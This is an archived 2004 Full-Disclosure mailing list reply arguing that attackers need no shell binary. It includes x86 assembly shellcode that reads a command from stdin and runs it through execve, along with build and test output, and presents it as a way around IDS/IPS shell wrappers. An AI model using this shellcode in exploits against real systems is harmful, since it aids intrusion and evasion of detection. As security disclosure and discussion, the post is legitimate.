[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [Full-Disclosure] No shell => secure?

To: full-disclosure@xxxxxxxxxxxxxxxx
Subject: Re: [Full-Disclosure] No shell => secure?
From: Martin Fallon <mar_fallon@xxxxxxxxxxxx>
Date: Fri, 9 Jul 2004 16:01:46 -0300 (ART)

Hello Srs.!

We don't need a shell. One shellcode use system calls
and the shellcode can be the shell. 

See the follow code:

-------------- noshell.s --------------
#Exemplo de assembly que simula shell.
#Sem utilizar nenhuma shell, ele é a shell.:)
#Nash Leon - nashleon@xxxxxxxxxxxx
#
#Obs: tah pegando apenas filename com 7 bytes.

_start:

#read(0,buffer,20)
xorl %ebx, %ebx
movl $3, %eax
leal -20(%esp),%ecx
movl $20, %edx
int $0x80


#execve(buffer)
pushl %ecx
popl   %esi
movl   %esi,0x8(%esi) 
movb   $0x0,0x7(%esi)
movl   $0x0,0xc(%esi)  
movl   $0xb,%eax
movl   %esi,%ebx 
leal   0x8(%esi),%ecx
#leal   0xc(%esi),%edx 
movl $0x0, %edx
int    $0x80                


#exit()
movl $0x1, %eax
xorl %ebx, %ebx
int $0x80
---------------------------------------

This source use read() and execve() to
execute one command from stdin. This sample is
only to demonstrate that is possible create
one shellcode that execute commands without
use one shell(/bin/bash,sh,zsh,tcsh, etc).

It is util when one NIDS/IPS interact with
one shell wrapper, waiting one string in the
interface, capturing an attack.

In this sample is permitted only
7 bytes as path filename to execute:

$ as -o noshell.o noshell.s
$ ld -o noshell noshell.s
ld: warning: cannot find entry symbol _start;
defaulting to 
0000000008048074

$ /noshell
/bin/ls
noshell  noshell.o  noshell.s

So, Mrs. One shell is not necessary to exploit
one system. NIDs/IPS can use wrapper in the system
call execve() to security, but still is possible
break this resource.

Sorry ny poor english.

Best Regard,

Martin Fallon.
Clube dos Mercenarios
http://cdm.frontthescene.com.br/








        
        
                
_______________________________________________________
Yahoo! Mail agora com 100MB, anti-spam e antivírus grátis!
http://br.info.mail.yahoo.com/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

References:
- Re: [Full-Disclosure] No shell => secure?
  - From: Wall, Kevin

Prev by Date: [Full-Disclosure] IRQL_NOT_LESS_THAN_OR_EQUAL
Next by Date: Re: [Full-Disclosure] No shell => secure?
Previous by thread: Re: [Full-Disclosure] No shell => secure?
Next by thread: RE: [Full-Disclosure] No shell => secure?
Index(es):
- Date
- Thread